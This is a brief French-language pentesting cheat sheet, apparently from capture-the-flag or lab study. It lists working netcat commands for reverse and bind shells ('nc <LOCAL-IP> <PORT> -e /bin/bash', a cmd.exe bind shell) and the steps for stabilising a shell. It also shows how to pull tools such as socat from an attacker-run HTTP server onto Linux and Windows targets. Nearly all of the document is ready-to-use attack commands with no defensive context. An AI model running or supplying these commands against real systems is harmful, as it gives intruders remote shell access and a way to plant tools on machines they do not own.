
**Types of Shell **

Bind shell

Reverse shell

**Obtenir reverse shell**

Marchine du hacker

`sudo nc -lvnp 443`

Marchine cible

`nc <LOCAL-IP> <PORT> -e /bin/bash`

**Obtenir bind Shell**

Marchine cible:

`nc -lvnp <port> -e "cmd.exe"`

Attaquant:

`nc MACHINE_IP <port>`


Stabiliser un shell netcat:

1 `python -c 'import pty;pty.spawn("/bin/bash")'`

2  La deuxième étape est : `export TERM=xterm` -- cela nous donnera accès aux commandes de terme telles que `clear`.

3  Enfin (et surtout), nous allons mettre le shell en arrière-plan en utilisant `Ctrl + Z`. De retour dans notre propre 
terminal, nous utilisons` stty raw -echo ; fg` . 

**Prendre fichier distant**:

Serveur attaquant:

    sudo python3 -m http.server 80

_Cible Linux_

    wget <LOCAL-IP>/socat -O /tmp/socat

_Cible windows_

    Invoke-WebRequest -uri <LOCAL-IP>/socat.exe -outfile C:\\Windows\temp\socat.exe

_Connaitre les dimensions du terminal_

    stty -a

_Modifier les dimensions_


`stty rows <number>`

`stty cols <number>`











